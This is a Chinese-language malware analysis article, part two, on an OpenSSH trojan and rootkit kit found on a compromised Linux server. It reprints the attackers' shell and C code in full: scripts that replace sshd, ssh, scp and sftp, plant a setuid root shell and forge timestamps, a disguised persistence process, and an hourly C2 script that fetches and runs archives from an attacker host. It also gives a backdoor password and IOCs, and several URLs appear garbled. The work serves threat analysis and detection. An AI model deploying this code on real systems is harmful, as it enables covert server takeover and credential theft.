解剖一次真正Linux 入侵:OpenSSH木马病毒工具2

2016 年 10 月 3 日3750

  ########################################## install partif [ "$install" = "1" ] ; then

  echo

  echo -e "\033[0;36m [x] creating sniffer files and main dir \033[0m\033[0m" #cyan

  echo -ne "\033[0;32m [+] \033[0m\033[0m" ; echo "Creating: /etc/pps"

  mkdir /etc/pps ; chmod 777 /etc/pps/

  luam_timestamp /etc/pps

  echo -ne "\033[0;32m [+] \033[0m\033[0m" ; echo "Creating: /etc/X11/.pr"

  mkdir /etc/X11 ; chmod 777 /etc/X11/ ; > /etc/X11/.pr

  luam_timestamp /etc/X11/.pr

  echo

  echo -e "\033[0;36m [x] creating goprem dir & file (suid) \033[0m\033[0m" #cyan

  echo -ne "\033[0;32m [+] \033[0m\033[0m" ; echo "creating: /usr/include/arpa"

  mkdir /usr/include 1>/dev/null 2>/dev/null

  mkdir /usr/include/arpa 1>/dev/null 2>/dev/null

  echo -ne "\033[0;32m [+] \033[0m\033[0m" ; echo "gcc goprem.c & moving"

  gcc goprem.c -o goprem 2>/dev/null

  mv goprem /usr/include/arpa/

  {C} chown root:root /usr/include/arpa/goprem

  chmod +s /usr/include/arpa/goprem

  luam_timestamp /usr/include/arpa/goprem

  echo

  echo -e "\033[0;36m [x] getting permisions in \033[0m\033[0m" #cyan

  echo -ne "\033[0;32m [+] \033[0m\033[0m" ; echo "/usr/sbin"

  chattr -R -aui /usr/sbin/ 1>/dev/null 2>/dev/null

  echo -ne "\033[0;32m [+] \033[0m\033[0m" ; echo "/usr/bin"

  chattr -R -aui /usr/bin/ 1>/dev/null 2>/dev/null

  echo -ne "\033[0;32m [+] \033[0m\033[0m" ; echo "/bin"

  chattr -R -aui /bin/ 1>/dev/null 2>/dev/null

  echo

  echo -e "\033[0;36m [x] replacing system files \033[0m\033[0m" #cyan

  maindir=`pwd` ; workdir="$maindir/$2"

  echo -ne "\033[0;32m [+] \033[0m\033[0m" ; echo "saving server's sshd in /etc/pps/old-srvf/"

  mkdir /etc/pps/old-srvf ; cp /usr/sbin/sshd /etc/pps/old-srvf/old55hd

  luam_timestamp /etc/pps/old-srvf

  luam_timestamp /etc/pps/old-srvf/old55hd

  echo -ne "\033[0;32m [+] \033[0m\033[0m" ; echo "/usr/sbin/sshd"

  cp -f $workdir/sshd-eu /usr/sbin/sshd

  luam_timestamp /usr/sbin/sshd

  echo -ne "\033[0;32m [+] \033[0m\033[0m" ; echo "/usr/bin/ssh"

  cp -f $workdir/ssh /usr/bin/ssh

  luam_timestamp /usr/bin/ssh

  echo -ne "\033[0;32m [+] \033[0m\033[0m" ; echo "/usr/bin/sftp"

  cp -f $workdir/sftp /usr/bin/sftp

  luam_timestamp /usr/bin/sftp

  echo -ne "\033[0;32m [+] \033[0m\033[0m" ; echo "/usr/bin/scp"

  cp -f $workdir/scp /usr/bin/scp

  luam_timestamp /usr/bin/scp

  echo

  echo -e "\033[0;36m [x] moving to the last step (sshd restart file) \033[0m\033[0m" #cyan

  echo " mv s_res /tmp/.bla ; cd /tmp/.bla ; rm -rf rkkit*"

  echo " nohup ./s_res 1>/dev/null 2>/dev/null "

  echo " tar zxf side_files.tgz -C /etc/pps ; cd /etc/pps/side_files ; rm -rf /tmp/.bla"

  echo

  exit

  fi

  # EOF install part

  脚本4(p3):

  该脚本是由脚本p2通过指令curl --progress-bar -O http://http://www.zjjv.com///.../auto/p3调用的。

  

  调用一些其他工具。

  在仔细研究附加脚本内容和其用处之前,我要先检查一下输出。

  这里有几个值得注意的地方,但是最有趣的是最后一行显示了被入侵系统的所有信息以及主机IP。甚至还为该系统分配了一个独特的ID。网络罪犯们保存这样的信息是为了跟踪所有的入侵系统。

\

  P3脚本的完整内容如下所示:

  #!/bin/bash

  ############## rkip install (p3)

  # echo -e "\033[0;31m [-] \033[0m\033[0m" # red

  # echo -e "\033[0;32m [+] \033[0m\033[0m" # green

  # echo -e "\033[0;36m xxx \033[0m\033[0m" #cyan

  os=`cat 1tempfiles/os.txt`

  rk=`cat 1tempfiles/rk.txt`

  side_files_dir=`cat 1tempfiles/side_files_dir.txt`

  maindir=`pwd`

  echo -e "\033[0;32m [+] \033[0m\033[0m downloading rkip" # green

  rm -rf side_files.tgz

  curl --progress-bar -O http://http://www.zjjv.com///.../auto/side_files.tgz

  if [ ! -f side_files.tgz ] ; then echo -e "\033[0;31m [-] \033[0m\033[0m file missing - download failed. aborting" ; echo ; exit ; fi

  echo -e "\033[0;32m [+] \033[0m\033[0m starting rkip install" # green

  if [ -z $side_files_dir ] ; then echo -e "\033[0;31m [-] \033[0m\033[0m no side_files_dir. aborting" ; echo ; exit ; fi

  rm -rf /etc/pps/side_files

  tar mzxf side_files.tgz ; rm -rf side_files.tgz ; cp -R side_files /etc/pps

  rkipdir="/etc/pps/side_files"

  cd $rkipdir ; yes y | ./install $side_files_dir 1>>$maindir/1tempfiles/log.rkip 2>>$maindir/1tempfiles/log.rkip

  node_process_id=$(pidof [pdflush-0])

  if [[ -z $node_process_id ]]; then

  #echo " nu exista"

  echo -e "\033[0;31m [-] \033[0m\033[0m background proccess did not start. aborting. check ($maindir/1tempfiles/log.rkip). script in /etc/pps/side_files"

  echo ; exit

  {C} fi

  echo -e "\033[0;32m [+] \033[0m\033[0m rkip install done (logs in $maindir/1tempfiles/log.rkip)"

  echo -e "\033[0;36m [x] \033[0m\033[0m write this down in your notepad :)" #cyan

  echo

  id_unic=`cat $maindir/1tempfiles/log.rkip|grep NOTEPAD`

  echo "$id_unic"

  echo

  #### cleaning shit out

  cd /etc/pps ; rm -rf side_files ; ./dep-safe.arhivez

  rm -rf $maindir

  side_files.tgz工具的分析

  安装脚本

  主脚本“安装”执行几个主要功能。它定义了一个timestamp-ptty函数来修改一些文件的时间戳,使得调查更加困难。选择的时间戳和/bin/ls中的类似。

  同时,它还会检查是否存在一些已定义的URL,这会在之后的检查中发挥作用。

  最后它还会调用另一个脚本dep-install_install2,这也是side_files.tgz的一部分。

  安装脚本的完整内容如下:

  #!/bin/bash

  # echo -ne "\033[0;31m [-] \033[0m\033[0m" # red

  # echo -ne "\033[0;32m [+] \033[0m\033[0m" # green

  # echo -ne "\033[0;36m xxx \033[0m\033[0m" #cyan

  if [ $# != 1 ]; then

  echo

  echo -e "\033[0;31m $0 [... | .unix] \033[0m\033[0m" # red

  echo -e "\033[0;36m [... | .unix] = which main server dir is used \033[0m\033[0m" #cyan

  echo

  exit;

  fi ; echo

  ############## facem linkul de la main server in functie de director

  myhost="gopremium.mooo.com"

  main_link="http://$myhost/$1"

  mkdir /usr/lib/libu.a/ 1>/dev/null 2>/dev/null

  ## adaog timestamp

  echo "timestamp-ptty" > /usr/lib/libu.a/TS8402386704

  touch -r /bin/ls /usr/lib/libu.a

  touch -r /bin/ls /usr/lib/libu.a/TS8402386704

  luam_timestamp() {

  touch -r /usr/lib/libu.a/TS8402386704 $1

  }

  ## EOF adaog timestamp

  echo "$main_link" > /usr/lib/libu.a/l3290367235

  luam_timestamp /usr/lib/libu.a/l3290367235

  main_link_check=`cat /usr/lib/libu.a/l3290367235`

  if [ "$main_link" == "$main_link_check" ] ; then

  #echo "aceleasi linkuri"

  echo -ne "\033[0;32m [+] \033[0m\033[0m" # green

  echo "main server link: $main_link_check"

  good=1

  else

  #echo "difera"

  echo -ne "\033[0;31m [-] \033[0m\033[0m" # red

  echo "there is something wrong with the main_link."

  good=0

  fi

  if [ "$good" != "1" ] ; then echo "Some files are missing or empty. Existing." ; echo ; exit ; fi

  echo -ne "\033[0;36m [x] \033[0m\033[0m" #cyan

  echo -n "press any key if link is okay" ; read a

  # EOF facem linkul de la main server in functie de director

  ### verificam daca e instalat ce folosim

  DEP=(

  '/usr/bin/curl'

  '/bin/sed'

  '/usr/bin/gcc'

  'dep-install_install2'

  'dep-install_ptty'

  )

  for t in "${DEP[@]}" ; do

  if [ -f $t ] ; then

  echo -ne "\033[0;32m [+] \033[0m\033[0m" # green

  echo "$t - found"

  else

  echo -ne "\033[0;31m [-] \033[0m\033[0m" # red

  echo "$t - MISSING OR EMPTY"

  good=0

  fi

  done

  if [ "$good" != "1" ] ; then echo "Some files are missing or empty. Existing." ; echo ; exit ; fi

  echo -ne "\033[0;36m [x] \033[0m\033[0m" #cyan

  echo "starting dep-install_install2"

  ./dep-install_install2

  对dep-install_install2脚本的分析

  该脚本的第一部分使用了同样的手段来修改文件的时间戳。

  然后它会查询http://http://www.zjjv.com///.unix/return_ip.php来找出受损系统的公开IP。

  此外还有一个函数来生成一个唯一的随机ID,用来定位受损系统。

  该脚本还会编译events.c,这是一个每小时运行一次的程序,作用是来启动另一个指令/usr/bin/ptty。它甚至会定义一个假名字[pdflush-0],pdfflush 是一个通常用于为高速缓存在 Linux 系统中运行的程序。还有另一个有趣的技术来隐藏恶意进程。

  Events.c内容如下:

  #include

  #include

  #define FAKE "[pdflush-0]"

  int main(int argc, char **argv){

  strcpy(argv[0],FAKE);

  while (1) {

  {C} sleep(3600);

  system("/usr/sbin/ptty 1>>/dev/null 2>>/dev/null");

  }

  return 0;

  }

  在C语言代码中被调用的 /usr/sbin/ptty指令是脚本 dep-install_ptty,这是TGZ文件的一部分。我会在之后具体解释脚本内容。

  此脚本所做的下一件事就是确保执行event二进制文件(编译文件)。这是通过修改/etc/init/env.conf 文件,在其中加入对外壳脚本 /usr/sbin/env. /usr/sbin/env的调用,该外壳程序是用来调用event二进制文件的。

  下面是修改版本的内容(请注意最后一行以及对/usr/sbin/env的调用):

  # env - Event System Register

  description "Event System Register"

  start on runlevel [2345]

  stop on runlevel [!2345]

  respawn

  exec /usr/sbin/env

  "/usr/bin/env" 也是side_files.tgz的一部分,基本上调用编译好的二进制文件 'events'.

  "/usr/sbin/env"中的代码:

  killall -9 events 1>/dev/null 2>/dev/null

  nohup events 1>/dev/null 2>/dev/null &

  通过对不同的文件的多次调用来执行恶意文件,并利用其他的二进制文件和配置文件,使得网络罪犯得以隐身。

  最后,脚本会发送一个 HTTP 请求到服务器,用来通知已经入侵了一个新的系统。

  对dep-install_ptty脚本的分析

  此脚本负责每小时与C&C进行交互。脚本的主要作用如下:

  · 检查是否还有其他用户连接到系统当中,由此来决定脚本剩余内容是否需要执行

  

  #!/bin/bash

  ptty_ver="3.0"

  ######### verificam daca e cineva logat si nu are idle.

  logati_fara_idle=`w|grep -v 'southsea\|inordkuo\|localte\|lolo'|grep -v days|cut -c43-50|grep s`

  if [[ -z $logati_fara_idle ]] ; then

  # echo "nu e nimeni activ pe server"

  useri=0

  else

  # echo "sunt useri activi pe server"

  useri=1

  fi

  # EOF verificam daca e cineva logat si nu are idle.

  ######## continuam cu scriptul DOAR DACA nu sunt useri activi pe server

  if [ "$useri" == "0" ] ; then

  ####### verificam daca merge dns-ul, daca nu, adaogam nameserver

  dns=`cat /etc/resolv.conf |grep 208.67.220.222`

  if [[ -z $dns ]] ; then

  # echo "dns nu e bun"

  echo "nameserver 208.67.220.222" >> /etc/resolv.conf

  fi

  # EOF verificam daca merge dns-ul, daca nu, adaogam nameserver

  ####### continuam cu scriptul DOAR DACA merge netul, verificam pe google

  url_check_net="http://http://www.zjjv.com//"

  if curl --output /dev/null --silent --head --fail "$url_check_net"; then

  # echo "URL exists: $url_check_net - merge netul"

  ip=`cat /usr/lib/libu.a/i1935678123`

  id_unic=`cat /usr/lib/libu.a/g239293471` # id unic pt fiecare server in parte, e generat la install

  url=`cat /usr/lib/libu.a/l3290367235` # hostul principal il ia din txt

  #url="http://192.168.137.177/test/sc/test" # hostul principal. E DEFINIT IN ptty SI IN install

  ### adaog timestamp

  luam_timestamp() {

  touch -r /usr/lib/libu.a/TS8402386704 $1 2>/dev/null

  }

  # EOF timestamp

  luam_timestamp /usr/lib/libu.a

  luam_timestamp /usr/lib/libu.a/l3290367235

  luam_timestamp /usr/lib/libu.a/i1935678123

  luam_timestamp /usr/lib/libu.a/g239293471

  ######### DACA EXISTA ARHIVA srvupdt.tgz PE SERVERUL DE BAZA, O DOWNLOADEAZA, EXTRAGE SI EXECUTA.

  url_srvupdt="$url/srvupdt.tgz" # il pui daca vrei sa lansezi un script pe servere

  {C} url_srvupdt_confirmare="$url/srvupdt.php?ip=$ip&tgz=srvupdt.tgz" # intra pe el ca sa confirme ca a tras arhiva

  if curl --output /dev/null --silent --head --fail "$url_srvupdt"; then

  # echo "URL exists: $url_srvupdt"

  curl -s "${url_srvupdt_confirmare}" 1>/dev/null 2>/dev/null &

  tempdir="/tmp/.tmp"

  rm -rf "$tempdir" 1>/dev/null 2>/dev/null

  mkdir "$tempdir" 1>/dev/null 2>/dev/null

  curl --silent "$url_srvupdt" --output "$tempdir"/srvupdt.tgz 2>/dev/null

  cd "$tempdir" 2>/dev/null

  tar zxvf srvupdt.tgz 1>/dev/null 2>/dev/null

  cd srvupdt 1>/dev/null 2>/dev/null

  ./install & 2>/dev/null

  fi

  # EOF DACA EXISTA ARHIVA PE SERVERUL DE BAZA, O DOWNLOADEAZA, EXTRAGE SI EXECUTA

  ######### ARHIVA SPECIAL FACUTA PT FIECARE SERVER IN PARTE. foloseste $id_unic

  url_id_unic="$url/srvupdt_$id_unic.tgz"

  url_id_unic_confirmare="$url/srvupdt.php?ip=$ip&tgz=srvupdt_$id_unic.tgz" # intra pe el ca sa confirme ca a tras arhiva

  if curl --output /dev/null --silent --head --fail "$url_id_unic"; then

  # echo "URL exists: $url_id_unic"

  curl -s "${url_id_unic_confirmare}" 1>/dev/null 2>/dev/null &

  tempdir="/var/tmp/.tmp"

  rm -rf "$tempdir" 1>/dev/null 2>/dev/null

  mkdir "$tempdir" 1>/dev/null 2>/dev/null

  curl --silent "$url_id_unic" --output "$tempdir"/srvupdt_$id_unic.tgz 2>/dev/null

  cd "$tempdir" 2>/dev/null

  tar zxvf srvupdt_$id_unic.tgz 1>/dev/null 2>/dev/null

  cd srvupdt_$id_unic 1>/dev/null 2>/dev/null

  ./install & 2>/dev/null

  fi

  # EOF RHIVA SPECIAL FACUTA PT FIECARE SERVER IN PARTE. foloseste $id_unic

  ########## PORNIM RESTUL SCRIPTULUI

  changes=0

  ip_changed="NO"

  sshd_changed="NO"

  sshd_backup_missing="NO"

  srv_was_down="NO"

  ######## verificam ce ip are serverul

  url_return_ip="$url/return_ip.php" # din el ia valoarea $new_ip fiecare server

  if curl --output /dev/null --silent --head --fail "$url_return_ip"; then

  new_ip=`curl -s "$url_return_ip"|grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}'`

  fi

  # EOF verificam ce ip are serverul

  ####### verificam daca s-a schimbat ip-ul

  if [ "$ip" != "$new_ip" ] ; then

  # s-a schimbat ip-ul

  changes=1

  ip_changed="$new_ip"

  fi

  # EOF verificam daca s-a schimbat ip-ul

  ####### verificam daca mai exista backup-ul la sshd-ul nostru si il comparam cu /usr/sbin/sshd

  if [ -f /usr/lib/libu.a/m9847292 ] ; then

  # exista fisierul nostru de rk

  size_rk=`wc -c

  size_sshd=`wc -c

  if [ "$size_rk" != "$size_sshd" ] ; then

  # cineva a schimbat sshd-ul

  ### punem sshd-ul meu inapoi

  cp /usr/lib/libu.a/m9847292 /usr/lib/libu.a/sshd 1>>/dev/null 2>>/dev/null

  chattr -aui /usr/sbin/sshd 1>>/dev/null 2>>/dev/null

  mv -f /usr/lib/libu.a/sshd /usr/sbin/sshd 1>>/dev/null 2>>/dev/null

  rm -rf /usr/lib/libu.a/sshd 1>>/dev/null 2>>/dev/null

  killall -9 sshd 1>>/dev/null 2>>/dev/null

  luam_timestamp /usr/sbin/sshd

  /usr/sbin/sshd 1>>/dev/null 2>>/dev/null

  # EOF punem sshd-ul meu inapoi

  changes=1

  {C} sshd_changed="YES"

  fi

  else

  # cineva a sters fisierul nostru de rk (backup-ul)

  changes=1

  sshd_backup_missing="YES"

  sshd_changed="UNKNOWN"

  fi

  # EOF verificam daca mai exista backup-ul la sshd-ul nostru si il comparam cu /usr/sbin/sshd

  ####### verificam daca sshd e pornit, daca nu, il pornim noi

  sshd_process=`ps x | grep -v grep|grep sshd`

  if [[ -z $sshd_process ]]; then

  # echo "nu ruleaza"

  /usr/sbin/sshd 1>>/dev/null 2>>/dev/null

  # nu mai dau notificare daca am pornit eu sshd

  # changes=1

  fi

  # EOF verificam daca sshd e pornit, daca nu, il pornim noi

  ###### verificam daca a fost cazut netul

  if [ -f /usr/lib/libu.a/h439302s ] ; then

  # serverul a fost cazut

  changes=1

  srv_was_down="YES"

  fi

  ##### DACA scriptul detecteaza schimbari, intram pe link

  if [ "$changes" = 1 ] ; then

  ### trimitem datele catre server

  curl -s "${url}/srv.php?ip=${ip}&ip_changed=${ip_changed}&sshd_changed=${sshd_changed}&sshd_backup_missing=${sshd_backup_missing}&srv_was_down=${srv_was_down}&ptty_ver=${ptty_ver}" 1>/dev/null 2>/dev/null &

  fi

  # EOF DACA scriptul detecteaza schimbari, intram pe link

  # EOF PORNIM RESTUL SCRIPTULUI

  else

  # echo "URL does NOT exist: $url_check_net - NU merge netul"

  mkdir /usr/lib/libu.a/ 1>/dev/null 2>/dev/null ## in caz ca ne-a sters cineva dir

  echo "srv was down" > /usr/lib/libu.a/h439302s 2>/dev/null

  luam_timestamp /usr/lib/libu.a/h439302s

  fi

  # EOF continuam cu scriptul DOAR DACA merge netul, verificam pe google

  fi

  # EOF continuam cu scriptul DOAR DACA nu sunt useri activi pe server

  最后,P3 脚本会运行一些命令和脚本来删除所有临时文件。

  总结:

  · 后门功能:

  · 一个通用于不同平台和架构的Linux系统的root工具包

  · 本地的root外壳程序

  · 主要的SSHD二进制文件被一个恶意文件覆盖。此二进制文件中包含有后门密码以确保访问。此外,任何通过该密码进行的访问都不会被跟踪,这个密码是PRtestD

  · 多重体系结构和模块化:

  · 对涉及的不同脚本使用模块化处理办法

  · 根据操作系统和体系结构的不同下载执行不同文件

  · 嗅探功能:木马感染几个二进制文件,比如scp、sftp、 ssh,来窃取用户名和密码。

  · 反鉴定功能:

  · 删除日志文件来删除入侵证据 (/var/log/messages, /var/log/secure, /var/log/lastlog, /var/log/wtmp)

  · 修改文件时间戳

  · Root工具包功能:

  · 通过不同技术隐藏进程和文件

  · C2C功能:

  · 每小时与C&C交互,通知系统中的任何变化(如:出现新IP)

  · 每小时与C&C交互,以获取任何更新

  更新:对于SSHD二进制文件中的后门密码的最新分析。

  IOCs

  5.189.136.43

  

  /etc/X11/.pr

  /etc/pps

  /usr/bin/ptty

  /etc/init/env.conf (containing /usr/sbin/env)

  /usr/bin/events/events

  MD5 (arm61/arm61/run-libcheck) = 34976ac680474edd12d16d84470bd702

  MD5 (arm61/arm61/scp) = 5eb1b59dbcd806ce41858bf40e10cab0

  MD5 (arm61/arm61/sftp) = dce8fc0c3ddf0351e4e81f404b85d7bb

  MD5 (arm61/arm61/ssh) = aeae5ae324e118021cb7e7ee7d5e7a26

  MD5 (arm61/arm61/sshd) = 7aadb643f8345fb59e8998e18209f71a

  MD5 (arm61/arm61/sshd-eu) = 7aadb643f8345fb59e8998e18209f71a

  MD5 (vyos/vyos/scp) = 6797f4801407052832ff482d5b1acf06

  MD5 (vyos/vyos/sftp) = 2d3a350e5210255f89a61a082254233f

  MD5 (vyos/vyos/ssh) = 5b3193530738e8e658c5ab8f63b5ee0d

  MD5 (vyos/vyos/sshd-eu) = 142e4198e11d405899619d49cc6dc79c

  MD5 (vyos/vyos/test-sshd) = 142e4198e11d405899619d49cc6dc79c

  MD5 (vyos64/vyos64/scp) = 300f7413eb76bf6905df1f5182e52f9e

  MD5 (vyos64/vyos64/sftp) = 01a4f0f38096df67e13c6e9ed7ccc205

  MD5 (vyos64/vyos64/ssh) = 3e7dfbac340929fc54aa459cc7ad181b

  MD5 (vyos64/vyos64/sshd-eu) = b327add04800e05480a020af2ab993e0

  MD5 (vyos64/vyos64/test-sshd) = b327add04800e05480a020af2ab993e0

  MD5 (edgeos/edgeos/scp) = ce8e196db65bed7862d98d4a14283ae4

  MD5 (edgeos/edgeos/sftp) = 0e34c468857e5e3d66ec2f0bd223d38c

  MD5 (edgeos/edgeos/ssh) = 47f2e08da73bb5e5d6c61d347d1bfbf1

  MD5 (edgeos/edgeos/sshd-eu) = 4b4e7ccb1f015a107ac052ba25dfe94e

  MD5 (edgeos/edgeos/test-sshd) = 4b4e7ccb1f015a107ac052ba25dfe94e

  MD5 (edgeos64/edgeos64/scp) = 602793976e2f41b5a1942cfd2784d075

  MD5 (edgeos64/edgeos64/sftp) = e597cfee6f877e82339fab3e322d79b7

  MD5 (edgeos64/edgeos64/ssh) = d5f6794c3b41f1d7f12715ba3315fd7b

  MD5 (edgeos64/edgeos64/sshd) = 973eee9fae6e3a353286206da7a89904

  MD5 (edgeos64/edgeos64/sshd-eu) = 973eee9fae6e3a353286206da7a89904

  MD5 (edgeos64/edgeos64/test-sshd) = e597cfee6f877e82339fab3e322d79b7

0 0